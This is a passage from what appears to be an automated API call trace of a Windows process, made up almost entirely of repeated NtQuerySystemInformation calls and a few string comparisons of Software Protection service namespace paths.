SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x28, ResultLength=0x0) [0240.733] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0240.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0240.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0240.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0240.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0240.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0240.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0240.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0240.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0240.754] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0240.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0240.762] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0240.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.766] NtQuerySystemInformation 